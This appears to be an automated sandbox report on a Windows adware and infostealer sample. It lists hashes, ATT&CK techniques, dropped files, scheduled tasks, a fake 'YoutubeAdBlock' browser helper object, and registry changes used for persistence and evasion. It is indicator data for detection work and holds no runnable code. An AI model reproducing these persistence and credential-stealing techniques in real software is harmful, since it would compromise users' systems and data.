7e0e41753d443d82da40eba933548b31ce5417559c1d159976322d6ed3050df7

Analysis

max time kernel
148s
max time network
189s
platform
windows7_x64
resource
win7v20210410
submitted
20-06-2021 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0a450955b5c37142aa1fca3f2631a77.exe
Size

6.2MB
MD5

d0a450955b5c37142aa1fca3f2631a77
SHA1

b177c6597e5fab0f19913ee54c521ef5055a6981
SHA256

7e0e41753d443d82da40eba933548b31ce5417559c1d159976322d6ed3050df7
SHA512

8734aa7ba21b31ab116e28e9fba59bcfef71d5031d4f7d57ccc6492a0305700d95b9d489b97f9ba0fb4237e1a7bc7e526be73eb45fe366e2e54739b6cc34b33a

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

9 1176 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeJwfUiAy.exeANjRVCE.exeBfmLoNG.exe

pid process

1180 SimplInst.exe
1472 SimplInst.exe
1448 JwfUiAy.exe
2016 ANjRVCE.exe
1996 BfmLoNG.exe

flow	pid	process
9	1176	rundll32.exe

pid	process
1180	SimplInst.exe
1472	SimplInst.exe
1448	JwfUiAy.exe
2016	ANjRVCE.exe
1996	BfmLoNG.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeSimplInst.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe

Loads dropped DLL 13 IoCs

Processes:

d0a450955b5c37142aa1fca3f2631a77.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
1940	d0a450955b5c37142aa1fca3f2631a77.exe
1180	SimplInst.exe
1180	SimplInst.exe
1180	SimplInst.exe
1180	SimplInst.exe
1180	SimplInst.exe
1472	SimplInst.exe
1472	SimplInst.exe
1472	SimplInst.exe
1176	rundll32.exe
1176	rundll32.exe
1176	rundll32.exe
1176	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSimplInst.exeJwfUiAy.exepowershell.EXEpowershell.exerundll32.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	JwfUiAy.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	JwfUiAy.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

ANjRVCE.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\hvTGbFZDECDfJ.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bn\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\iudtmyt.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\vJaGxEf.xml	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	ANjRVCE.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\background.html	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\anjFGKdzU\vGFDCf.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_GB\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\PjDbKng.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\uhOxPaZ.dll	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es_419\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\loowqnz.exe	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\anjFGKdzU\PKtxXPA.xml	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	ANjRVCE.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ar\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	ANjRVCE.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\osLuquk.xml	ANjRVCE.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
952	schtasks.exe
788	schtasks.exe
1536	schtasks.exe
1352	schtasks.exe
1996	schtasks.exe
1052	schtasks.exe
812	schtasks.exe
844	schtasks.exe
776	schtasks.exe
596	schtasks.exe
1196	schtasks.exe
1488	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

ANjRVCE.exeBfmLoNG.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MAIN	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	ANjRVCE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions	ANjRVCE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	BfmLoNG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	BfmLoNG.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	ANjRVCE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\loowqnz.exe = "9999"	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	ANjRVCE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "loowqnz.exe"	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ANjRVCE.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights	ANjRVCE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "loowqnz.exe"	ANjRVCE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495402b442020b9103ecd92874870e	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ANjRVCE.exe

Modifies data under HKEY_USERS 39 IoCs

Processes:

wscript.exerundll32.exeJwfUiAy.exepowershell.exeANjRVCE.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	JwfUiAy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	JwfUiAy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-12-ee-ee-9a-77\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-12-ee-ee-9a-77\WpadDecisionTime = 009363c5ab65d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	JwfUiAy.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80e217abab65d701	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000408ff6aaab65d701	JwfUiAy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ANjRVCE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-12-ee-ee-9a-77\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = 009363c5ab65d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ANjRVCE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-12-ee-ee-9a-77	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\56-12-ee-ee-9a-77	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	JwfUiAy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ANjRVCE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe

Modifies registry class 64 IoCs

Processes:

ANjRVCE.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\loowqnz.exe"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	ANjRVCE.exe
